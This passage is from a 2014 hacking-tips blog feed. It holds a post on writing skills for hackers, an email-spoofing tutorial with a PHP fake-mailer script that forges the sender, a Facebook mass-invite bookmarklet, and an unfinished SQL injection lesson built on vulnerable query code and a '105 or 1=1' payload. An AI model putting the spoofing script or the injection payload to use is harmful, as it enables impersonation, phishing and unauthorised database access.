Linus Torvalds, a Finn, comments his code in English (it apparently never occurred to him to do otherwise). His fluency in English has been an important factor in his ability to recruit a worldwide community of developers for Linux. It&#39;s an example worth following.&lt;br /&gt;
Being a native English-speaker does not guarantee that you have language skills good enough to function as a hacker. If your writing is semi-literate, ungrammatical, and riddled with misspellings, many hackers (including myself) will tend to ignore you. While sloppy writing does not invariably mean sloppy thinking, we&#39;ve generally found the correlation to be strong — and we have no use for sloppy thinkers. If you can&#39;t yet write competently, learn to.&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://gouravinfo.blogspot.com/feeds/1238338563913377204/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://gouravinfo.blogspot.com/2014/02/how-to-become-hacker.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/1238338563913377204'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/1238338563913377204'/><link rel='alternate' type='text/html' href='http://gouravinfo.blogspot.com/2014/02/how-to-become-hacker.html' title='How to Become A Hacker'/><author><name>Gourav Ratnawat</name><uri>http://www.blogger.com/profile/03815155318390279322</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIZoLmC65AXKrNABnNfxhzeowPYCsr93DX9SQDkIH_2SEiHQddadPoboFvNG0_zEDxj6lGmengwWk33scEp3cO0HegFS-kxERyTDTOrM2tMtgbhtE_4_a7jORklx4yVGs/s220/FB_IMG_1557336607561.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-276484908558385294.post-3234206422474474714</id><published>2014-02-14T18:45:00.001+05:30</published><updated>2014-02-14T18:45:07.968+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Ethical Hacking"/><title type='text'>E-mail Spoofing: Anonymous Mail Through Php</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #444444; font-family: Tahoma, Geneva, sans-serif; font-size: 14px; line-height: 21px; margin-bottom: 1.5em; orphans: 4; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://basichackingskills.files.wordpress.com/2013/06/email.jpg?w=300&amp;amp;h=203&quot; imageanchor=&quot;1&quot;&gt;&lt;img alt=&quot;email&quot; border=&quot;0&quot; src=&quot;http://basichackingskills.files.wordpress.com/2013/06/email.jpg?w=300&amp;amp;h=203&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #444444; font-family: Tahoma, Geneva, sans-serif; font-size: 14px; line-height: 21px; margin-bottom: 1.5em; orphans: 4; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
Hi friends! Few weeks back I have got few mails asking me to write on tracing anonymous mails. So I thought today to get started with the topic of anonymous mailing. Before you learn to trace an email you must know to create an anonymous&amp;nbsp;mail. Using this technique you can email any user from any email service&amp;nbsp;you wish. You don’t even need the access to the email id from which you want the email to be sent. Today I am gonna introduced to a website service&amp;nbsp;and will give you a&amp;nbsp;basic idea&amp;nbsp;on how it works!&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #444444; font-family: Tahoma, Geneva, sans-serif; font-size: 14px; line-height: 21px; margin-bottom: 1.5em; orphans: 4; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
After reading this article you will be able to send an email from any&amp;nbsp;email address. This is also known as&amp;nbsp;&lt;strong style=&quot;border: 0px; font-family: inherit; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Email Spoofing.&lt;/strong&gt;&amp;nbsp;This can be cone in many methods, in this post I will describe to do it with a&amp;nbsp;&lt;strong style=&quot;border: 0px; font-family: inherit; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;fake mailer php script.&lt;span id=&quot;more-556&quot; style=&quot;border: 0px; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #444444; font-family: Tahoma, Geneva, sans-serif; font-size: 14px; line-height: 21px; margin-bottom: 1.5em; orphans: 4; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;strong style=&quot;border: 0px; font-family: inherit; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Note:&amp;nbsp;&lt;/strong&gt;If you send an email from an id of a particular server to the id that corresponds to the same server then your email may alert the user! That is, if you mail from a Gmail&amp;nbsp;id to another Gmail id using fake mailer script then there&amp;nbsp;would be a&amp;nbsp;warning message that would be displayed at the bottom of the email.&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #444444; font-family: Tahoma, Geneva, sans-serif; font-size: 14px; line-height: 21px; margin-bottom: 1.5em; orphans: 4; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
So let’s start the email spoofing…!&lt;/div&gt;
&lt;ol style=&quot;background-color: white; border: 0px; color: #444444; font-family: Tahoma, Geneva, sans-serif; font-size: 14px; line-height: 21px; list-style-position: outside; margin: 1.5em 2.5em; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;li style=&quot;border: 0px; font-family: inherit; font-style: inherit; font-weight: inherit; list-style-type: decimal; margin: 0px 0px 12px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Go to&amp;nbsp;&lt;a href=&quot;http://emkei.cz/&quot; sl-processed=&quot;1&quot; style=&quot;-webkit-tap-highlight-color: rgb(240, 29, 79); background-color: transparent; border: 0px; color: #01a0db; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;http://emkei.cz&lt;/a&gt;&lt;/li&gt;
&lt;li style=&quot;border: 0px; font-family: inherit; font-style: inherit; font-weight: inherit; list-style-type: decimal; margin: 0px 0px 12px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Fill the&amp;nbsp;&lt;strong style=&quot;border: 0px; font-family: inherit; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;From Name&lt;/strong&gt;,&amp;nbsp;&lt;strong style=&quot;border: 0px; font-family: inherit; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;From Email&lt;/strong&gt;&amp;nbsp;and&amp;nbsp;&lt;strong style=&quot;border: 0px; font-family: inherit; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;To&amp;nbsp;&lt;/strong&gt;fields.&lt;/li&gt;
&lt;li style=&quot;border: 0px; font-family: inherit; font-style: inherit; font-weight: inherit; list-style-type: decimal; margin: 0px 0px 12px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Write the message in the&amp;nbsp;&lt;strong style=&quot;border: 0px; font-family: inherit; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Text&lt;/strong&gt;&amp;nbsp;field.&lt;/li&gt;
&lt;li style=&quot;border: 0px; font-family: inherit; font-style: inherit; font-weight: inherit; list-style-type: decimal; margin: 0px 0px 12px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Enter the&amp;nbsp;&lt;strong style=&quot;border: 0px; font-family: inherit; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;CAPTCHA&lt;/strong&gt;&amp;nbsp;and click&amp;nbsp;&lt;strong style=&quot;border: 0px; font-family: inherit; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Send&lt;/strong&gt;!&lt;/li&gt;
&lt;li style=&quot;border: 0px; font-family: inherit; font-style: inherit; font-weight: inherit; list-style-type: decimal; margin: 0px 0px 12px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Agree the&amp;nbsp;&lt;strong style=&quot;border: 0px; font-family: inherit; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;T&amp;amp;C&lt;/strong&gt;&amp;nbsp;and your mail is sent!&lt;/li&gt;
&lt;/ol&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #444444; font-family: Tahoma, Geneva, sans-serif; font-size: 14px; line-height: 21px; margin-bottom: 1.5em; orphans: 4; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;strong style=&quot;border: 0px; font-family: inherit; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;So what is happening here?&lt;/strong&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #444444; font-family: Tahoma, Geneva, sans-serif; font-size: 14px; line-height: 21px; margin-bottom: 1.5em; orphans: 4; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
This webpage contains a&amp;nbsp;PHP code similar to the one which is given below. This script generates an email that is to be sent with the provided from email address and then it confirms whether the mail is successfully sent or not.&lt;/div&gt;
&lt;blockquote style=&quot;background-color: white; border: 0px; color: #444444; font-family: Tahoma, Geneva, sans-serif; font-size: 14px; font-style: italic; line-height: 1.6em; margin: 1.5em 0px; outline: 0px; padding: 0px; quotes: none; vertical-align: baseline;&quot;&gt;
&lt;div dir=&quot;ltr&quot; style=&quot;border: 0px; box-sizing: border-box; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;div style=&quot;border: 0px; box-sizing: border-box; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
echo” Enter the&amp;nbsp;’To’ email address:”;&lt;/div&gt;
&lt;div style=&quot;border: 0px; box-sizing: border-box; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
$to = $_GET[email];&lt;br /&gt;echo”Enter the ‘Subject’ of email”;&lt;br /&gt;$subject = $_GET[header];&lt;br /&gt;echo”Enter the ‘From’ email address:”;&lt;/div&gt;
&lt;div style=&quot;border: 0px; box-sizing: border-box; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
$fake = $_GET[from];&lt;br /&gt;echo”Enter the ‘Message’”;&lt;br /&gt;$message = $_GET[message];&lt;br /&gt;}&lt;br /&gt;$headers = “MIME-Version: 1.0″ . “\r\n”;&lt;br /&gt;$headers .= “Content-type:text/html;charset=iso-8859-1″ . “\r\n”;&lt;br /&gt;$headers .= “From: ” . $fake . ” &amp;lt;” . $fake . “&amp;gt;” . “\r\n”;&lt;br /&gt;if (mail($to, $subject, $message, $headers))&lt;br /&gt;{&lt;br /&gt;echo”The e-mail was successfully sent to&amp;nbsp;&lt;i&gt;” . $to . “&lt;/i&gt;&lt;br /&gt;\n”;&lt;br /&gt;echo”From:&amp;nbsp;&lt;i&gt;” . $fake . “&lt;/i&gt;&lt;br /&gt;\n”;&lt;br /&gt;echo”Subject:&amp;nbsp;&lt;i&gt;” . $subject . “&lt;/i&gt;&lt;br /&gt;\n”;&lt;br /&gt;echo”Message:&lt;br /&gt;\n”;&lt;br /&gt;echo”&lt;b&gt;” . $message . “&lt;/b&gt;&lt;br /&gt;“;&lt;br /&gt;}&lt;br /&gt;else&lt;br /&gt;{&lt;br /&gt;echo”Opps there was a problem sending the email\n”;&lt;br /&gt;}&lt;br /&gt;?&amp;gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/blockquote&gt;
&lt;div dir=&quot;ltr&quot; style=&quot;background-color: white; border: 0px; box-sizing: border-box; color: #444444; font-family: Tahoma, Geneva, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;div style=&quot;border: 0px; box-sizing: border-box; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
To get this script into action you will have to host this PHP script at a web hosting server. Then you have to make a webpage using HTML and&amp;nbsp;in the&amp;nbsp;form of&amp;nbsp;&lt;strong style=&quot;border: 0px; font-family: inherit; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;action=fakemailer.php&lt;/strong&gt;&amp;nbsp;has to be written. The&amp;nbsp;&lt;strong style=&quot;border: 0px; font-family: inherit; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;fakemailer.php&lt;/strong&gt;&amp;nbsp;is the name of the hosted PHP file with the above code.&lt;/div&gt;
&lt;div style=&quot;border: 0px; box-sizing: border-box; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;div style=&quot;border: 0px; box-sizing: border-box; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
Remember, the email which is sent will&amp;nbsp;be associated with an&amp;nbsp;IP address of the web server where you hosted your PHP script. Therefore this makes the fake make traceable!&lt;/div&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-style: inherit; font-weight: inherit; margin-bottom: 1.5em; orphans: 4; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
A detailed description on creating such kind of webpages and tracing the anonymous mails&amp;nbsp;will be provided in my upcoming articles.&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;border: 0px; box-sizing: border-box; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
Till&amp;nbsp;then have fun experimenting with fake mailing!&lt;/div&gt;
&lt;div style=&quot;border: 0px; box-sizing: border-box; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
Feel free to comment below… Your&amp;nbsp;response is most precious to us!&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://gouravinfo.blogspot.com/feeds/3234206422474474714/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://gouravinfo.blogspot.com/2014/02/e-mail-spoofing-anonymous-mail-through.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/3234206422474474714'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/3234206422474474714'/><link rel='alternate' type='text/html' href='http://gouravinfo.blogspot.com/2014/02/e-mail-spoofing-anonymous-mail-through.html' title='E-mail Spoofing: Anonymous Mail Through Php'/><author><name>Gourav Ratnawat</name><uri>http://www.blogger.com/profile/03815155318390279322</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIZoLmC65AXKrNABnNfxhzeowPYCsr93DX9SQDkIH_2SEiHQddadPoboFvNG0_zEDxj6lGmengwWk33scEp3cO0HegFS-kxERyTDTOrM2tMtgbhtE_4_a7jORklx4yVGs/s220/FB_IMG_1557336607561.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-276484908558385294.post-5241830638747495253</id><published>2014-02-02T20:24:00.002+05:30</published><updated>2014-02-02T20:24:28.286+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Facebook"/><title type='text'>Code to Invite All Facebook Friends At Once</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div role=&quot;article&quot; style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14.079999923706055px;&quot;&gt;
&lt;div class=&quot;_1x1&quot; style=&quot;padding: 10px 0px 15px;&quot;&gt;
&lt;div class=&quot;userContentWrapper&quot;&gt;
&lt;div class=&quot;_wk&quot; style=&quot;font-size: 13px; line-height: 18px;&quot;&gt;
&lt;div class=&quot;text_exposed_root&quot; style=&quot;display: inline;&quot;&gt;
&lt;b&gt;Facebook friends inviter&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;_wk&quot; style=&quot;font-size: 13px; line-height: 18px;&quot;&gt;
&lt;div class=&quot;text_exposed_root&quot; style=&quot;display: inline;&quot;&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://allfacebook.com/files/2011/03/invites.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;390&quot; src=&quot;http://allfacebook.com/files/2011/03/invites.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;_wk&quot; style=&quot;font-size: 13px; line-height: 18px;&quot;&gt;
&lt;div class=&quot;text_exposed_root&quot; style=&quot;display: inline;&quot;&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;_wk&quot; style=&quot;font-size: 13px; line-height: 18px;&quot;&gt;
&lt;div class=&quot;text_exposed_root&quot; style=&quot;display: inline;&quot;&gt;
This is javascript code to invite all facebook friends for a event/page at once.&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;_wk&quot; style=&quot;font-size: 13px; line-height: 18px;&quot;&gt;
&lt;div class=&quot;text_exposed_root&quot; style=&quot;display: inline;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;_wk&quot; style=&quot;font-size: 13px; line-height: 18px;&quot;&gt;
&lt;div class=&quot;text_exposed_root&quot; id=&quot;id_52ee59438de4c3493576188&quot; style=&quot;display: inline;&quot;&gt;
Instructions:&lt;br /&gt;1. Click Invite Friends on whatever you are inviting people to&lt;br /&gt;2. In the dropdown next to the search box, make sure Search All Friends or &quot;Search by name&quot; is selected!&lt;br /&gt;3. Scroll ALL the way down until names stop loading (I found it easy to click the first name and then hold down the spa&lt;span class=&quot;text_exposed_show&quot; style=&quot;display: inline !important;&quot;&gt;cebar or Page Down button)&lt;br /&gt;4. For EVENTS Copy this code:&lt;br /&gt;javascript:elms=document.getEl&lt;wbr&gt;&lt;/wbr&gt;&lt;span class=&quot;word_break&quot; style=&quot;display: inline-block;&quot;&gt;&lt;/span&gt;ementsByName(&quot;checkableitems[]&lt;wbr&gt;&lt;/wbr&gt;&lt;span class=&quot;word_break&quot; style=&quot;display: inline-block;&quot;&gt;&lt;/span&gt;&quot;);for (i=0;i&amp;lt;elms.length;i++){if (elms[i].type=&quot;checkbox&quot; )elms[i].click()}&lt;br /&gt;&lt;br /&gt;For PAGES Copy this code:&lt;br /&gt;javascript:var inputs = document.getElementsByClassNam&lt;wbr&gt;&lt;/wbr&gt;&lt;span class=&quot;word_break&quot; style=&quot;display: inline-block;&quot;&gt;&lt;/span&gt;e(&#39;uiButton _1sm&#39;);&lt;br /&gt;for(var i=0; i&amp;lt;inputs.length;i++) {&lt;br /&gt;inputs[i].click();&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;5. Past the code into the URL bar of your browser (where you type website addresses), but WAIT! Check the beginning of the URL bar and make sure the word &quot;javascript:&quot; is there, if it is not, TYPE IT IN! A lot of browsers automatically delete the &quot;javascript:&quot; portion. Press enter.&lt;br /&gt;6. For large friends list, this may utilize all your resources and will cause the page to freeze and be unresponsive. Just wait a few minutes until all the names get selected.&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;_wk&quot; style=&quot;font-size: 13px; line-height: 18px;&quot;&gt;
&lt;div class=&quot;text_exposed_root&quot; style=&quot;display: inline;&quot;&gt;
&lt;span class=&quot;text_exposed_show&quot; style=&quot;display: inline !important;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;_wk&quot; style=&quot;font-size: 13px; line-height: 18px;&quot;&gt;
&lt;div class=&quot;text_exposed_root&quot; style=&quot;display: inline;&quot;&gt;
&lt;span class=&quot;text_exposed_show&quot; style=&quot;display: inline !important;&quot;&gt;&lt;b&gt;please Drop a comment!&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://gouravinfo.blogspot.com/feeds/5241830638747495253/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://gouravinfo.blogspot.com/2014/02/code-to-invite-all-facebook-friends-at.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/5241830638747495253'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/5241830638747495253'/><link rel='alternate' type='text/html' href='http://gouravinfo.blogspot.com/2014/02/code-to-invite-all-facebook-friends-at.html' title='Code to Invite All Facebook Friends At Once'/><author><name>Gourav Ratnawat</name><uri>http://www.blogger.com/profile/03815155318390279322</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIZoLmC65AXKrNABnNfxhzeowPYCsr93DX9SQDkIH_2SEiHQddadPoboFvNG0_zEDxj6lGmengwWk33scEp3cO0HegFS-kxERyTDTOrM2tMtgbhtE_4_a7jORklx4yVGs/s220/FB_IMG_1557336607561.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-276484908558385294.post-842650351942799675</id><published>2014-01-19T19:56:00.001+05:30</published><updated>2014-01-19T19:56:37.390+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Applications"/><category scheme="http://www.blogger.com/atom/ns#" term="Computer"/><category scheme="http://www.blogger.com/atom/ns#" term="Ethical Hacking"/><title type='text'>SQL Injection Attack</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;intro&quot; style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 14px; line-height: 18.200000762939453px; margin-top: 10px;&quot;&gt;
An SQL Injection can destroy your database.&lt;/div&gt;
&lt;hr style=&quot;background-color: #d4d4d4; border: 0px; clear: both; color: #d4d4d4; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; height: 1px;&quot; /&gt;
&lt;h2 style=&quot;background-color: white; font-family: verdana, helvetica, arial, sans-serif; font-size: 22px; font-weight: normal; margin-bottom: 10px; margin-top: 10px;&quot;&gt;
SQL in Web Pages&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
In the previous chapters, you have learned to retrieve (and update) database data, using SQL.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
When SQL is used to display data on a web page, it is common to let web users input their own search values.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
Since SQL statements are text only, it is easy, with a little piece of computer code, to dynamically change SQL statements to provide the user with selected data:&lt;/div&gt;
&lt;div class=&quot;example&quot; style=&quot;background-color: #e5eecc; background-image: linear-gradient(rgb(255, 255, 255), rgb(229, 238, 204) 100px); border: 1px solid rgb(212, 212, 212); font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; margin: 0px; padding: 5px; width: auto;&quot;&gt;
&lt;h2 class=&quot;example&quot; style=&quot;background-color: transparent; color: #617f10; font-size: 14px; font-weight: normal; margin-bottom: 10px; margin-top: 0px;&quot;&gt;
Server Code&lt;/h2&gt;
&lt;div class=&quot;example_code notranslate&quot; style=&quot;background-color: white; border: 1px solid rgb(212, 212, 212); font-family: &#39;courier new&#39;; font-size: 14px; padding: 5px; width: auto;&quot;&gt;
txtUserId = getRequestString(&quot;UserId&quot;);&lt;br /&gt;txtSQL = &quot;SELECT * FROM Users WHERE UserId = &quot; + txtUserId;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
The example above, creates a select statement by adding a variable (txtUserId) to a select string. The variable is fetched from the user input (Request) to the page.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
The rest of this chapter describes the potential dangers of using user input in SQL statements.&lt;/div&gt;
&lt;hr style=&quot;background-color: #d4d4d4; border: 0px; clear: both; color: #d4d4d4; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; height: 1px;&quot; /&gt;
&lt;h2 style=&quot;background-color: white; font-family: verdana, helvetica, arial, sans-serif; font-size: 22px; font-weight: normal; margin-bottom: 10px; margin-top: 10px;&quot;&gt;
SQL Injection&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
SQL injection is a technique where malicious users can inject SQL commands into an SQL statements, via web page input.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
Injected SQL commands can alter SQL statement and compromises the security of a web application.&lt;/div&gt;
&lt;hr style=&quot;background-color: #d4d4d4; border: 0px; clear: both; color: #d4d4d4; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; height: 1px;&quot; /&gt;
&lt;h2 style=&quot;background-color: white; font-family: verdana, helvetica, arial, sans-serif; font-size: 22px; font-weight: normal; margin-bottom: 10px; margin-top: 10px;&quot;&gt;
SQL Injection Based on 1=1 is Always True&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
Look at the example above, one more time.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
Let&#39;s say that the original purpose of the code was to create an SQL statement to select a user with a given user id.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
If there is nothing to prevent a user from entering &quot;wrong&quot; input, the user can enter some &quot;smart&quot; input like this:&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
UserId:&lt;br /&gt;&lt;input name=&quot;UserId&quot; style=&quot;font-size: 12.800000190734863px;&quot; type=&quot;text&quot; value=&quot;105 or 1=1&quot; /&gt;&lt;/div&gt;
&lt;div class=&quot;example&quot; style=&quot;background-color: #e5eecc; background-image: linear-gradient(rgb(255, 255, 255), rgb(229, 238, 204) 100px); border: 1px solid rgb(212, 212, 212); font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; margin: 0px; padding: 5px; width: auto;&quot;&gt;
&lt;h2 class=&quot;example&quot; style=&quot;background-color: transparent; color: #617f10; font-size: 14px; font-weight: normal; margin-bottom: 10px; margin-top: 0px;&quot;&gt;
Server Result&lt;/h2&gt;
&lt;div class=&quot;example_code notranslate&quot; style=&quot;background-color: white; border: 1px solid rgb(212, 212, 212); font-family: &#39;courier new&#39;; font-size: 14px; padding: 5px; width: auto;&quot;&gt;
SELECT * FROM Users WHERE UserId = 105 or 1=1&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
The SQL above is valid. It will return all rows from the table Users, since&amp;nbsp;&lt;strong&gt;WHERE 1=1&lt;/strong&gt;&amp;nbsp;is always true.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
Does the example above seem dangerous? What if the Users table contains names and passwords?&lt;/div&gt;
